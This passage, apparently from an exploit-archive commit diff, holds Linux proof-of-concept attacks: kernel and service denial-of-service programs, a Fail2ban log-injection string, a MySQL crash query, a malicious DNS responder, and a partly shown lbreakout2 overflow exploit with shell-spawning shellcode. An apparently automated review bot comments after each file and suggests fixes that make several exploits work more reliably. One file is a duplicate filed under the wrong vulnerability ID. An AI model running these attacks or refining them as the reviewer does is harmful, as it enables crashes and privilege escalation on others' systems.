fatal("fdopen: %s", strerror(errno));
if (fgets(buf, sizeof(buf), fp) == 0)
fatal("connection lost");
chat(fp, "mail from:<me@me>", fp);
for (;;)
chat(fp, "rcpt to:<me@%s>", argv[1]);
}
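Review bot: `chat(FILE * fp, char *fmt,...)` is declared without a return type and never returns a value, and `exit()` is called without `<stdlib.h>`; both are warnings or errors with current compilers, so declare it `void chat(...)` and add the include. The call `chat(fp, "mail from:<me@me>", fp);` passes a stray third argument that the format string never consumes; drop the trailing `fp`. Unlike the Perl PoC for the same BID, this one does check the reply code and exits on a non-2xx response, which is the behaviour a reader should expect from a memory-exhaustion test.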

10
platforms/linux/dos/21262.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/4018/info
kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client.
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.
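Review bot: the transcript hard-codes `telnet 10.0.0.1 1030`, but nothing in the hunk says how the listening port was found or whether 1030 is fixed or chosen at runtime; add a line on discovering it on the target (for example `netstat` or `lsof` against the kicq process) before the `telnet` step, and state that the client must already be running and listening for the crash to reproduce.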

32
platforms/linux/dos/22105.c Executable file

@ -0,0 +1,32 @@
source: http://www.securityfocus.com/bid/6420/info
A denial of service vulnerability has been discovered in the Linux 2.2 kernel. It has been reported that it is possible for an unprivileged user to cause the kernel to stop responding due to a bug in the implementation of mmap().
It should be noted that this issue does not affect the 2.4 kernel tree. This is because support for mmap() in the /proc/pid/mem implementation has been dropped.
#define PAGES 10
#include <asm/page.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/ptrace.h>
int main() {
int ad1,ad2,zer,mem,pid,i;
zer=open("/dev/zero",O_RDONLY);
ad1=(int)mmap(0,PAGES*PAGE_SIZE,0,MAP_PRIVATE,zer,0);
pid=getpid();
if (!fork()) {
char p[64];
ptrace(PTRACE_ATTACH,pid,0,0);
sleep(1);
sprintf(p,"/proc/%d/mem",pid);
mem=open(p,O_RDONLY);
ad2=(int)mmap(0,PAGES*PAGE_SIZE,PROT_READ,MAP_PRIVATE,mem,ad1);
write(1,(char*)ad2,PAGES*PAGE_SIZE);
}
sleep(100);
return 0;
}
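Review bot: `#include <asm/page.h>` pulls a kernel-internal header for `PAGE_SIZE`; it is not part of the user-space include set on most systems, so the PoC will not build as-is. Use `getpagesize()` or `sysconf(_SC_PAGESIZE)` instead. The casts `ad1=(int)mmap(...)` and the use of `ad1` as the file offset assume a pointer fits in an `int`, which holds on the 32-bit 2.2 systems this targets but truncates on 64-bit; keep them as `void *` and `off_t`. The child also falls through to the parent's `sleep(100)` after its `write()`; add `_exit(0)` at the end of the `if (!fork())` block so only one process is left waiting.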

108
platforms/linux/dos/24078.c Executable file

@ -0,0 +1,108 @@
source: http://www.securityfocus.com/bid/10264/info
PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled.
The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop.
/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
by Shadowinteger <shadowinteger@sentinix.org>
2004-05-04
Written after reading the security advisory posted by borg (ChrisR-) on
Bugtraq 2004-05-03 (my time). ChrisR -> www.cr-secure.net
Acknowledgments: sabu (www.sabu.net)
Vulnerability:
PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
(function in mm/mmap.c) is vulnerable to a local Denial of Service attack
because of a bug that puts the kernel into an infinite loop.
Read the security advisory for more info:
http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0
Exploitation:
We need to get passed the following line of code in
arch_get_unmapped_area() to succeed with a DoS:
if (TASK_SIZE - len < addr) { ...
We do it like this:
TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL
DOSVAL is the value we'll use.
arch_get_unmapped_area() does the following:
if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code.
(TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.
A DOSVAL of e.g. 0x80000000 or above will work most times, no real need
for the funky calculation above.
There are quite a few functions available that are "front-ends" to
arch_get_unmapped_area(). This exploit uses good-old mmap().
Tiny DoS PoC:
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);}
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>
#define TASK_SIZE 0xc0000000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x04000000
#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK)
int main() {
int fd = open("/dev/zero", O_RDONLY);
printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n"
"by Shadowinteger <shadowinteger@sentinix.org> 20040504\n"
"created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n"
"ChrisR -> www.cr-secure.net\n"
"\n"
"the exploit binary must be marked PF_PAX_RANDMMAP to work!\n"
"\n"
"greetz goes to: sabu (www.sabu.net)\n"
"\n"
"------------------------------------------------------------------------------\n"
"will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n"
"\n"
"if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n"
"are you sure you want to continue? [type Y to continue] ", DOSVAL);
fflush(stdout);
if (getchar() != 'Y') {
printf("aborted.\n");
return 0;
}
printf("\n"
"attempting to DoS...\n");
if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {
perror("mmap");
}
printf("your kernel does not seem to be vulnerable! :)\n");
return 0;
}
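Review bot: the banner says `the exploit binary must be marked PF_PAX_RANDMMAP to work!` but the hunk never says how to set that flag, and the code prints `your kernel does not seem to be vulnerable! :)` whenever `mmap()` returns at all. Two consequences: `open("/dev/zero", O_RDONLY)` is unchecked, so a failed open makes `mmap` fail with EBADF and the PoC reports "not vulnerable" for the wrong reason; and a binary without the RANDMMAP marking takes the same non-vulnerable path, so a reader cannot distinguish "patched kernel" from "unmarked binary". Check `fd` after the `open`, and document the marking step (the PaX control utilities set per-binary flags) before the run instructions.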

11
platforms/linux/dos/26248.sh Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/14790/info
The Linux kernel is prone to a denial-of-service vulnerability. The kernel is affected by a memory leak, which eventually can result in a denial of service.
A local attacker can exploit this vulnerability by making repeated reads to the '/proc/scsi/sg/devices' file, which will exhaust kernel memory and lead to a denial of service.
#!/bin/sh
while true; do
cat /proc/scsi/sg/devices > /dev/null
done
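Review bot: the loop never terminates and prints nothing, so a reader has no way to confirm the leak the description claims short of the host running out of memory; suggest noting that kernel memory should be watched in a second terminal (`/proc/meminfo` or `/proc/slabinfo`) while this runs. Also `/proc/scsi/sg/devices` only exists when the `sg` driver is loaded, so the `cat` fails with "No such file or directory" on hosts without it and the loop spins uselessly.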

243
platforms/linux/dos/26382.c Executable file

@ -0,0 +1,243 @@
source: http://www.securityfocus.com/bid/15156/info
Linux Kernel is reported prone to a local denial-of-service vulnerability.
This issue arises from an infinite loop when binding IPv6 UDP ports.
/*
* Linux kernel
* IPv6 UDP port selection infinite loop
* local denial of service vulnerability
* proof of concept code
* version 1.0 (Oct 29 2005)
* CVE ID: CAN-2005-2973
*
* by Remi Denis-Courmont < exploit at simphalempin dot com >
* http://www.simphalempin.com/dev/
*
* Vulnerable:
* - Linux < 2.6.14 with IPv6
*
* Not vulnerable:
* - Linux >= 2.6.14
* - Linux without IPv6
*
* Fix:
* http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;
* a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2
*/
/*****************************************************************************
* Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* 1. Redistributions of source code must retain the above copyright notice, *
* this list of conditions and the following disclaimer. *
* 2. Redistribution in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in the *
* documentation and/or other materials provided with the distribution. *
* *
* The author's liability shall not be incurred as a result of loss of due *
* the total or partial failure to fulfill anyone's obligations and direct *
* or consequential loss due to the software's use or performance. *
* *
* The current situation as regards scientific and technical know-how at the *
* time when this software was distributed did not enable all possible uses *
* to be tested and verified, nor for the presence of any or all faults to *
* be detected. In this respect, people's attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software's suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
* *
* The author does not either expressly or tacitly warrant that this *
* software does not infringe any or all third party intellectual right *
* relating to a patent, software or to any or all other property right. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
static int
bind_udpv6_port (uint16_t port)
{
int fd;
fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
if (fd != -1)
{
struct sockaddr_in6 addr;
int val = 1;
setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));
memset (&addr, 0, sizeof (addr));
addr.sin6_family = AF_INET6;
addr.sin6_port = htons (port);
if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)
return fd;
close (fd);
}
return -1;
}
static int
get_fd_limit (void)
{
struct rlimit lim;
getrlimit (RLIMIT_NOFILE, &lim);
lim.rlim_cur = lim.rlim_max;
setrlimit (RLIMIT_NOFILE, &lim);
return (int)lim.rlim_max;
}
static void
get_port_range (uint16_t *range)
{
FILE *stream;
/* conservative defaults */
range[0] = 1024;
range[1] = 65535;
stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r");
if (stream != NULL)
{
unsigned i[2];
if ((fscanf (stream, "%u %u", i, i + 1) == 2)
&& (i[0] <= i[1]) && (i[1] < 65535))
{
range[0] = (uint16_t)i[0];
range[1] = (uint16_t)i[1];
}
fclose (stream);
}
}
/* The criticial is fairly simple to raise : the infinite loop occurs when
* calling bind with no speficied port number (ie zero), if and only if the
* IPv6 stack cannot find any free UDP port within the local port range
* (normally 32768-61000). Because this requires times more sockets than what
* a process normally can open at a given time, we have to spawn several
* processes. Then, the simplest way to trigger the crash condition consists
* of opening up kernel-allocated UDP ports until it crashes, but that is
* fairly slow (because allocation are stored in small a hash table of lists,
* that are checked at each allocation). A much faster scheme involves getting
* the local port range from /proc, allocating one by one, and only then, ask
* for automatic (any/zero) port allocation.
*/
static int
proof (void)
{
int lim, val = 2;
pid_t pid, ppid;
uint16_t range[2], port;
lim = get_fd_limit ();
if (lim <= 3)
return -2;
get_port_range (range);
port = range[0];
ppid = getpid ();
puts ("Stage 1...");
do
{
switch (pid = fork ())
{
case 0:
for (val = 3; val < lim; val++)
close (val);
do
{
if (bind_udpv6_port (port) >= 0)
{
if (port)
port++;
}
else
if (port && (errno == EADDRINUSE))
port++; /* skip already used port */
else
if (errno != EMFILE)
/* EAFNOSUPPORT -> no IPv6 stack */
/* EADDRINUSE -> not vulnerable */
exit (1);
if (port > range[1])
{
puts ("Stage 2... should crash quickly");
port = 0;
}
}
while (errno != EMFILE);
break; /* EMFILE: spawn new process */
case -1:
exit (2);
default:
wait (&val);
if (ppid != getpid ())
exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);
}
}
while (pid == 0);
puts ("System not vulnerable");
return -val;
}
int
main (int argc, char *argv[])
{
setvbuf (stdout, NULL, _IONBF, 0);
puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n"
"proof of concept code\n"
"Copyright (C) 2005 Remi Denis-Courmont "
"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
return -proof ();
}
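Review bot: `get_port_range()` rejects a valid upper bound of exactly 65535 (`(i[1] < 65535)`) and silently falls back to the 1024-65535 defaults, which makes Stage 1 bind far more ports than necessary on hosts configured that way; `<=` is the intended check. `uint16_t` is used without `<stdint.h>` (it arrives via `<netinet/in.h>` on glibc, but include it explicitly). The header comment has "criticial" and "speficied" for "critical" and "specified". Otherwise the staged approach is sound: bind every port in the local range explicitly, then ask for port 0 so the kernel's search finds nothing free, which is the condition the description says loops forever.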

243
platforms/linux/dos/26489.c Executable file

@ -0,0 +1,243 @@
source: http://www.securityfocus.com/bid/15365/info
Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from a failure to properly unregister kernel resources when network devices are removed.
This issue allows local attackers to deny service to legitimate users. Attackers may also be able to execute arbitrary code in the context of the kernel, but this has not been confirmed.
/*
* Linux kernel
* IPv6 UDP port selection infinite loop
* local denial of service vulnerability
* proof of concept code
* version 1.0 (Oct 29 2005)
* CVE ID: CAN-2005-2973
*
* by Remi Denis-Courmont < exploit at simphalempin dot com >
* http://www.simphalempin.com/dev/
*
* Vulnerable:
* - Linux < 2.6.14 with IPv6
*
* Not vulnerable:
* - Linux >= 2.6.14
* - Linux without IPv6
*
* Fix:
* http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;
* a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2
*/
/*****************************************************************************
* Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the following conditions *
* are met: *
* 1. Redistributions of source code must retain the above copyright notice, *
* this list of conditions and the following disclaimer. *
* 2. Redistribution in binary form must reproduce the above copyright *
* notice, this list of conditions and the following disclaimer in the *
* documentation and/or other materials provided with the distribution. *
* *
* The author's liability shall not be incurred as a result of loss of due *
* the total or partial failure to fulfill anyone's obligations and direct *
* or consequential loss due to the software's use or performance. *
* *
* The current situation as regards scientific and technical know-how at the *
* time when this software was distributed did not enable all possible uses *
* to be tested and verified, nor for the presence of any or all faults to *
* be detected. In this respect, people's attention is drawn to the risks *
* associated with loading, using, modifying and/or developing and *
* reproducing this software. *
* The user shall be responsible for verifying, by any or all means, the *
* software's suitability for its requirements, its due and proper *
* functioning, and for ensuring that it shall not cause damage to either *
* persons or property. *
* *
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR *
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES *
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. *
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, *
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT *
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF *
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *
* *
* The author does not either expressly or tacitly warrant that this *
* software does not infringe any or all third party intellectual right *
* relating to a patent, software or to any or all other property right. *
* Moreover, the author shall not hold someone harmless against any or all *
* proceedings for infringement that may be instituted in respect of the *
* use, modification and redistrbution of this software. *
*****************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
static int
bind_udpv6_port (uint16_t port)
{
int fd;
fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
if (fd != -1)
{
struct sockaddr_in6 addr;
int val = 1;
setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val));
memset (&addr, 0, sizeof (addr));
addr.sin6_family = AF_INET6;
addr.sin6_port = htons (port);
if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0)
return fd;
close (fd);
}
return -1;
}
static int
get_fd_limit (void)
{
struct rlimit lim;
getrlimit (RLIMIT_NOFILE, &lim);
lim.rlim_cur = lim.rlim_max;
setrlimit (RLIMIT_NOFILE, &lim);
return (int)lim.rlim_max;
}
static void
get_port_range (uint16_t *range)
{
FILE *stream;
/* conservative defaults */
range[0] = 1024;
range[1] = 65535;
stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r");
if (stream != NULL)
{
unsigned i[2];
if ((fscanf (stream, "%u %u", i, i + 1) == 2)
&& (i[0] <= i[1]) && (i[1] < 65535))
{
range[0] = (uint16_t)i[0];
range[1] = (uint16_t)i[1];
}
fclose (stream);
}
}
/* The criticial is fairly simple to raise : the infinite loop occurs when
* calling bind with no speficied port number (ie zero), if and only if the
* IPv6 stack cannot find any free UDP port within the local port range
* (normally 32768-61000). Because this requires times more sockets than what
* a process normally can open at a given time, we have to spawn several
* processes. Then, the simplest way to trigger the crash condition consists
* of opening up kernel-allocated UDP ports until it crashes, but that is
* fairly slow (because allocation are stored in small a hash table of lists,
* that are checked at each allocation). A much faster scheme involves getting
* the local port range from /proc, allocating one by one, and only then, ask
* for automatic (any/zero) port allocation.
*/
static int
proof (void)
{
int lim, val = 2;
pid_t pid, ppid;
uint16_t range[2], port;
lim = get_fd_limit ();
if (lim <= 3)
return -2;
get_port_range (range);
port = range[0];
ppid = getpid ();
puts ("Stage 1...");
do
{
switch (pid = fork ())
{
case 0:
for (val = 3; val < lim; val++)
close (val);
do
{
if (bind_udpv6_port (port) >= 0)
{
if (port)
port++;
}
else
if (port && (errno == EADDRINUSE))
port++; /* skip already used port */
else
if (errno != EMFILE)
/* EAFNOSUPPORT -> no IPv6 stack */
/* EADDRINUSE -> not vulnerable */
exit (1);
if (port > range[1])
{
puts ("Stage 2... should crash quickly");
port = 0;
}
}
while (errno != EMFILE);
break; /* EMFILE: spawn new process */
case -1:
exit (2);
default:
wait (&val);
if (ppid != getpid ())
exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2);
}
}
while (pid == 0);
puts ("System not vulnerable");
return -val;
}
int
main (int argc, char *argv[])
{
setvbuf (stdout, NULL, _IONBF, 0);
puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n"
"proof of concept code\n"
"Copyright (C) 2005 Remi Denis-Courmont "
"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
return -proof ();
}
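Review bot: the file body does not match its description. The description is for BID 15365 (a failure to unregister kernel resources when network devices are removed), but the code that follows is a verbatim copy of 26382.c from earlier in this commit, the IPv6 UDP port-selection loop for CAN-2005-2973, header comment and fix link included. Either the wrong file was attached or the BID reference is wrong; the entry should carry the actual network-device PoC or have its description corrected before it is indexed under this ID.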

10
platforms/linux/dos/29683.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/22737/info
The Linux Kernel is prone to a denial-of-service vulnerability.
A local attacker can exploit this issue to crash the kernel.
Linux kernel versions 2.6.x are vulnerable to this issue.
1. auditctl -w /etc/shadow
2. useradd userb
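Review bot: both listed steps require root (`auditctl -w /etc/shadow` needs audit-control privilege and `useradd` writes `/etc/shadow`), so the hunk does not show what an unprivileged "local attacker" controls; state that the watch rule is assumed to be configured by the administrator already and name the step the attacker performs, or otherwise show an unprivileged trigger. `Linux kernel versions 2.6.x are vulnerable` is too broad to act on; give the fixed release.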

14
platforms/linux/dos/30430.txt Executable file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/25117/info
Fail2ban is prone to a remote denial-of-service vulnerability because the application fails to properly ensure the validity of authentication-failure messages.
Successfully exploiting this issue allows remote attackers to add arbitrary IP addresses to the block list used by the application. This allows attackers to deny further network access to arbitrary IP addresses, denying service to legitimate users.
Fail2ban 0.8.0 and prior versions are vulnerable to this issue.
This issue may be demonstrated by connecting to an SSH server with 'nc', and sending the following string:
ROOT LOGIN REFUSED hi FROM 1.2.3.4
where '1.2.3.4' is an IP address to be blocked.
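Review bot: the hunk shows the payload but not the connection it rides on or why it works; spell out the command (`nc <host> 22`, then the line as the first thing sent) and the mechanism: sshd logs the unexpected line it received as a bad protocol identification, so the attacker-chosen text `ROOT LOGIN REFUSED hi FROM 1.2.3.4` lands in the auth log, where Fail2ban's pattern matches it and bans `1.2.3.4` instead of the real client address. Add a caution that the spoofed address must be one the tester owns, since banning a third party's address is the attack itself.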

22
platforms/linux/dos/30744.txt Executable file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/26353/info
MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input.
Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers.
This issue affects MySQL 5.1.23 and prior versions.
mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set
mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
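Review bot: the transcript ends on the trigger statement with no recorded outcome, so a reader cannot tell the crash from an empty result; append the server's response after the second `SELECT * FROM test WHERE CONTAINS(foo, 'bar');` (the lost-connection error or the relevant `mysqld` log lines). Worth stating explicitly that the identical query before `ALTER TABLE test ADD INDEX (foo(100))` returns `Empty set`, so the prefix index on the TEXT column is the precondition, and that `CONTAINS()` is a spatial function being applied to a non-spatial column, which appears to be the unexpected input the description refers to.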

39
platforms/linux/dos/30895.pl Executable file

@ -0,0 +1,39 @@
source: http://www.securityfocus.com/bid/26902/info
The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.
Successfully exploiting this issue allows attackers to crash applications that use the affected module.
Net::DNS 0.60 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module
use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
print "Awaiting UDP messages on port $PORTNO\n";
my $oldmsg = "\x5a\x40\x81\x80\x00\x01\x00\x01\x00\x01\x00\x01\x07\x63\x72\x61".
"\x63\x6b\x6d\x65\x0a\x6d\x61\x73\x74\x65\x72\x63\x61\x72\x64\x03".
"\x63\x6f\x6d\x00\x00\x01\x00\x01\x03\x77\x77\x77\x0e\x62\x65\x79".
"\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00".
"\x00\x01\x00\x01\x00\x00\x00\x01\x00\x04\xc0\xa8\x01\x02\x0e\x62".
"\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f".
"\x6d\x00\x00\x02\x00\x01\x00\x00\x00\x01\x00\x1b\x02\x6e\x73\x03".
"\x77\x77\x77\x0e\x62\x65\x79\x6f\x6e\x64\x73\x65\x63\x75\x72\x69".
"\x74\x79\x03\x63\x6f\x6d\x00\x02\x6e\x73\x0e\x62\x65\x79\x6f\x6e".
"\x64\x73\x65\x63\x75\x72\x69\x74\x79\x03\x63\x6f\x6d\x00\x00\x01".
"\x00\x01\x00\x00\x00\x01\x00\x01\x41";
while ($sock->recv($newmsg, $MAXLEN)) {
my($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
print "Client $hishost said ``$newmsg''\n";
$sock->send($oldmsg);
$oldmsg = "[$hishost] $newmsg";
}
die "recv: $!";
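Review bot: the loop ends with `$oldmsg = "[$hishost] $newmsg";`, left over from the UDP echo-server template this is built on, which overwrites the crafted DNS response after the first query; every later client gets an echo of its own packet instead of the malformed answer. Delete that line so `$oldmsg` keeps the payload. `$oldmsg` is also declared twice (in the `my(...)` list and again as `my $oldmsg = ...`), which `use strict` tolerates but `-w` flags. The server listens on port 5351, so the Net::DNS resolver under test has to be pointed at that port explicitly rather than 53, and `gethostbyaddr` can return undef, leaving `$hishost` empty in the log line.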

7
platforms/linux/dos/35432.txt Executable file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46796/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35432.pcap
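Review bot: the entry is a link to a capture file with no reproduction step, no affected version range and no indication of which dissector dereferences the NULL pointer; add the Wireshark versions covered by the BID, the protocol the capture targets and the step (open the capture in a vulnerable build) so a reader can reproduce without replaying a blind file.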

186
platforms/linux/local/23738.c Executable file

@ -0,0 +1,186 @@
source: http://www.securityfocus.com/bid/9712/info
Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application.
A malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the game process.
/*
* lbreakout2 < 2.4beta-2 local exploit by Li0n7@voila.fr
* vulnerability reported by Ulf Harnhammar <Ulf.Harnhammar.9485@student.uu.se>
* usage: ./lbreakout2-exp [-r <RET>][-b [-s <STARTING_RET>]]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <errno.h>
#define BSIZE 200
#define D_START 0xbfffffff
#define PATH "/usr/local/bin/lbreakout2"
void exec_vuln();
int tease();
int make_string(long ret_addr);
int bruteforce(long start);
void banner(char *argv);
char shellcode[]=
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char *buffer,*ptr;
int
main(int argc,char *argv[])
{
char * option_list = "br:s:";
int option,brute = 0,opterr = 0;
long ret,start = D_START;
if (argc < 2) banner(argv[0]);
while((option = getopt(argc,argv,option_list)) != -1)
switch(option)
{
case 'b':
brute = 1;
break;
case 'r':
ret = strtoul(optarg,NULL,0);
make_string(ret);
tease();
exit(1);
break;
case 's':
start = strtoul(optarg,NULL,0);
break;
case '?':
fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
banner(argv[0]);
exit(1);
}
if(brute)
bruteforce(start);
return 0;
}
void
exec_vuln()
{
execl(PATH,PATH,NULL);
}
int
tease()
{
pid_t pid;
pid_t wpid;
int status;
pid = fork();
if (pid == -1)
{
fprintf(stderr, "[-] %s: Failed to fork()\n",strerror(errno));
exit(13);
}
else if (pid == 0)
{
exec_vuln();
}
else
{
wpid = wait(&status);
if (wpid == -1)
{
fprintf(stderr,"[-] %s: wait()\n",strerror(errno));
return 1;
}
else if (wpid != pid)
abort();
else
{
if (WIFEXITED(status))
{
fprintf(stdout,"[+] Exited: shell's ret code = %d\n",WEXITSTATUS(status));
return WEXITSTATUS(status);
}
else if (WIFSIGNALED(status))
return WTERMSIG(status);
else
fprintf(stderr,"[-] Stopped.\n");
}
}
return 1;
}
int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;
buffer = (char *)malloc(1024);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory\n");
exit(-1);
}
ret = ret_addr;
ptr = buffer;
memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);
memcpy(ptr,shellcode,strlen(shellcode));
ptr += strlen(shellcode);
addr_ptr = (long *)ptr;
for(i=0;i<200;i++)
*(addr_ptr++) = ret;
